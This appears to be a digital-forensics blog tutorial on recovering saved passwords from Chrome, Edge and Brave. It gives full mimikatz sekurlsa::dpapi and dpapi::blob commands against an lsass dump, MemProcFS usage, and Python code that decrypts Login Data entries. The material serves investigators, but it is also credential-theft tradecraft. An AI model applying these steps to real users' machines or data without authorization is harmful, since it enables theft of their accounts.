Forensic Recovery of Chrome Based Browser Passwords
Recently John Hammond released this excellent video [1] showing how threat actors leverage tools to harvest credentials stored in the Chrome browser. I recommend checking his video and YouTube channel for other cyber security topics. During an investigation, the credentials stored in Chrome-based browsers (Chrome, Edge, Brave, etc.) may be a critical piece of information to support and/or solve the case under analysis. Few tools are able to parse that information and extract such relevant data for the forensic investigator. Inspired by John’s video and the tool created by Jayden Oh Yicong [2], I challenged myself to adapt the Python script and, in conjunction with other tools, decrypt sensitive data stored in Chromium browsers.
Disclaimer
All the information shared here should be used carefully. Please be advised that you should not use this tool or knowledge without proper authorization. Use at your own risk.
Requirements
In order to successfully proceed with the password decryption, you will need the following evidence, preserved during the acquisition phase of the forensic process:
- Memory dump of the machine
- The files Local State and Default\Login Data, collected from the browser’s \User Data\ path. Some references:
- Edge: C:\Users\user\AppData\Local\Microsoft\Edge\User Data
- Chrome: C:\Users\user\AppData\Local\Google\Chrome\User Data
- Brave: C:\Users\user\AppData\Local\BraveSoftware\Brave-Browser\User Data\
Scenario
Imagine that during a digital forensic investigation you have acquired the data mentioned above; you’re lucky. I have created a test environment using Microsoft Edge and saved this fake credential in the browser settings. The credential is encrypted with the AES algorithm, and the AES key is itself encrypted with the Windows Data Protection API (DPAPI). That is why, when I click the ‘eye’ icon to show the password, Edge asks for my credentials before displaying the saved password.
Process
As previously mentioned, the password is encrypted with a key stored in the JSON Local State file. In older Chrome versions, this key was used directly to decrypt the passwords in the local SQLite database file Login Data. Newer Chrome versions improved security: this key is now itself encrypted with DPAPI, using the user’s master key, which adds another layer of protection. This is how the password appears in the `Login Data` database file, table logins:
Since we were prepared for this case, we collected the required files, including the memory dump. We can now mount the memory image with MemProcFS [3] and extract the minidump of the lsass process.
C:\Cases>c:\Binaries\MemProcFS\MemProcFS.exe -device Evidence\MEM.dmp
Initialized 64-bit Windows 10.0.19041
[PLUGIN] Python initialization failed. Python 3.6 or later not found.
============================== MemProcFS ==============================
- Author: Ulf Frisk - pcileech@frizk.net
- Info: https://github.com/ufrisk/MemProcFS
- License: GNU Affero General Public License v3.0
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
MemProcFS is free open source software. If you find it useful please
become a sponsor at: https://github.com/sponsors/ufrisk Thank You :)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Version: 5.7.0 (Windows)
- Mount Point: M:\
- Tag: 19041_ac62bdf1
- Operating System: Windows 10.0.19041 (X64)
==========================================================================
The memory is mounted as a network share on drive letter `M:`. Navigate to the M:\name\lsass-PID.exe\minidump directory. In this path you should see a file named minidump.dmp: this is the memory dump of the lsass process. I will not go into details here, but LSASS (Local Security Authority Subsystem Service) is the process responsible for authentication, auditing and policy enforcement in Windows. That gives a hint of why this process’s memory is so important to our analysis. Let’s continue.
M:\name\lsass.exe-652\minidump>dir
Volume in drive M is DOKAN
Volume Serial Number is 1983-1116
Directory of M:\name\lsass.exe-652\minidump
07/08/2023 12:10 PM 390 readme.txt
07/08/2023 12:11 PM 49,352,704 minidump.dmp
07/08/2023 12:12 PM <DIR> ..
07/08/2023 12:12 PM <DIR> .
2 File(s) 49,353,094 bytes
2 Dir(s) 536,870,912 bytes free
Once the file is copied, open minidump.dmp with mimikatz [4] and export the master key of the user under investigation. Save the MasterKey value: it is the first part of the secret we need to give our tool to decrypt the Chrome encryption key. We will use it later, as you will see.
mimikatz # sekurlsa::minidump C:\Cases\Exports\minidump.dmp
Switch to MINIDUMP : 'C:\Cases\Exports\minidump.dmp'
mimikatz # sekurlsa::dpapi
Authentication Id : 0 ; 803867 (00000000:000c441b)
Session : Interactive from 1
User Name : jdoe
Domain : DESKTOP
Logon Server : DESKTOP
Logon Time : 7/8/2023 12:46:44 PM
SID : S-1-5-21-1446339068-3897733333-3874546977-1001
[00000000]
* GUID : {35df93df-4eea-430a-89b7-a329d854bfb6}
* Time : 7/8/2023 12:49:33 PM
* MasterKey : 4da03d*****************************************01a3a51
* sha1(key) : 766**********************04c
Now, open the Local State file of your Chromium browser. In this example, since I’m using Microsoft Edge, the path is C:\Users\jdoe\AppData\Local\Microsoft\Edge\User Data\Local State. Search (Ctrl+F) for “encrypted” and copy the encrypted_key value. This value is base64-encoded. Decode it with your preferred tool (I’m using CyberChef) and save the output to disk in binary format (enckey.dat).
Open the saved file (enckey.dat) in your favorite hex editor and remove the DPAPI string at the beginning of the file. Save it. This is how it should look:
Before
After
After saving the modified binary, we have the encrypted key that will be used to decrypt the saved Chrome passwords, but there is one more problem: this key is encrypted with the user’s DPAPI master key. To proceed with the decryption, go back to mimikatz and this time use the dpapi module to decrypt the encrypted blob:
mimikatz # dpapi::blob /in:"C:\Cases\Exports\enckey.dat" /unprotect /masterkey:4da03d**************************01a3a51
**BLOB**
dwVersion : 00000001 - 1
guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
dwMasterKeyVersion : 00000001 - 1
guidMasterKey : {35df93df-4eea-430a-89b7-a329d854bfb6}
dwFlags : 00000010 - 16 (audit ; )
dwDescriptionLen : 0000001e - 30
szDescription : Microsoft Edge
algCrypt : 00006610 - 26128 (CALG_AES_256)
dwAlgCryptLen : 00000100 - 256
dwSaltLen : 00000020 - 32
pbSalt : a3f63******************************************1f49503
dwHmacKeyLen : 00000000 - 0
pbHmackKey :
algHash : 0000800e - 32782 (CALG_SHA_512)
dwAlgHashLen : 00000200 - 512
dwHmac2KeyLen : 00000020 - 32
pbHmack2Key : c903***************************************************************50cf5
dwDataLen : 00000030 - 48
pbData : 9a30d***************************************************************************f195bd51
dwSignLen : 00000040 - 64
pbSign : b942c*******************************************************************************32edb
* using CryptUnprotectData API
* masterkey : 4da03d***********************************01a3a51
description : Microsoft Edge
data: d9 11 1e e3 5b 80 5b 52 c3 6d a2 5b 53 da 42 a6 10 73 d2 c4 ad 59 2a 29 5b ba 7c 9f 58 16 4a 20
Now we have the key used to encrypt the password in Login Data database.
- Key: d9111ee35b805b52c36da25b53da42a61073d2c4ad592a295bba7c9f58164a20
Decrypt the Passwords
We’re almost there, just bear with me. Using all the information collected in the previous steps and the decrypted key, we can now use the script I tweaked to decrypt the passwords stored in the browser [7]. Run the Python script with the key you collected:
$ python3 dcp.py -S 'd9111ee35b805b52c36da25b53da42a61073d2c4ad592a295bba7c9f58164a20' -P './Default/Login Data'
Sequence: 0
URL: https://gmail.com/
User Name: myusername@gmail.com
Password: MySecretPassword_918!!!
**************************************************
Bingo, here is our password:
- MySecretPassword_918!!!
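The decryption step itself, as an added Python example that is not the article’s dcp.py or the script from [2]: it reads the logins table of a Login Data copy and unwraps each v10 password_value with AES-256-GCM using the key recovered above. It assumes the `cryptography` package is installed; the database row and the 32-byte key are constructed here, so it runs offline and also shows what a wrong key looks like.

```python
import os, sqlite3
from cryptography.hazmat.primitives.ciphers.aead import AESGCM   # assumed available

def decrypt_v10(key, blob):
    """Chromium layout: b'v10' + 12-byte nonce + ciphertext + 16-byte GCM tag."""
    if not blob.startswith(b"v10"):
        raise ValueError("not a v10 blob (older entries are protected with DPAPI directly)")
    nonce, ciphertext_and_tag = blob[3:15], blob[15:]
    return AESGCM(key).decrypt(nonce, ciphertext_and_tag, None).decode("utf-8")

def dump_logins(key, conn):
    """Return (url, username, password) per row; a bad key or tag is reported, not fatal."""
    out = []
    for url, user, pw_blob in conn.execute(
            "SELECT origin_url, username_value, password_value FROM logins"):
        try:
            out.append((url, user, decrypt_v10(key, pw_blob)))
        except Exception as exc:             # InvalidTag on wrong key, ValueError on format
            out.append((url, user, f"<undecryptable: {type(exc).__name__}>"))
    return out

def build_sample_db(key):
    """Constructed in-memory Login Data with one row encrypted the way Chromium does it."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE logins (origin_url TEXT, username_value TEXT, password_value BLOB)")
    nonce = os.urandom(12)
    blob = b"v10" + nonce + AESGCM(key).encrypt(nonce, b"MySecretPassword_918!!!", None)
    conn.execute("INSERT INTO logins VALUES (?, ?, ?)",
                 ("https://gmail.com/", "myusername@gmail.com", blob))
    return conn

# Constructed 32-byte key; in a real case use bytes.fromhex() of the mimikatz 'data' output
SAMPLE_KEY = bytes.fromhex("00112233445566778899aabbccddeeff00112233445566778899aabbccddeeff")

if __name__ == "__main__":
    for url, user, pw in dump_logins(SAMPLE_KEY, build_sample_db(SAMPLE_KEY)):
        print(f"URL: {url}\nUser Name: {user}\nPassword: {pw}")
```

For a real case, connect sqlite3 to a copy of the exported Login Data file (never the live one) and pass it to dump_logins with the hex key from the dpapi::blob output.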
Summary
Again, one more interesting scenario where a digital forensic investigator can use different techniques to extract critical information that may be extremely relevant to the case under analysis. Of course there are other methods to acquire the same information, including collecting the master key from disk [5], but that only works if we have access to the user’s password. Another option would be to upload the script [2] to the machine, execute it and collect the resulting CSV file. In some cases, however, you are simply presented with the evidence and have no option to go back to the scenario and execute other tools. I hope this article helps the digital forensic community recover important information relevant to a case.
Final words: when you don’t have the tool you need to do the job, just remember Bear Grylls:
References
[1] https://www.youtube.com/watch?v=CIOsemj3kl4
[2] https://github.com/ohyicong/decrypt-chrome-passwords
[3] https://github.com/ufrisk/MemProcFS
[4] https://github.com/gentilkiwi/mimikatz/
[5] https://nandynarwhals.org/sieberrsec-ctf-3.0-digginginthedump/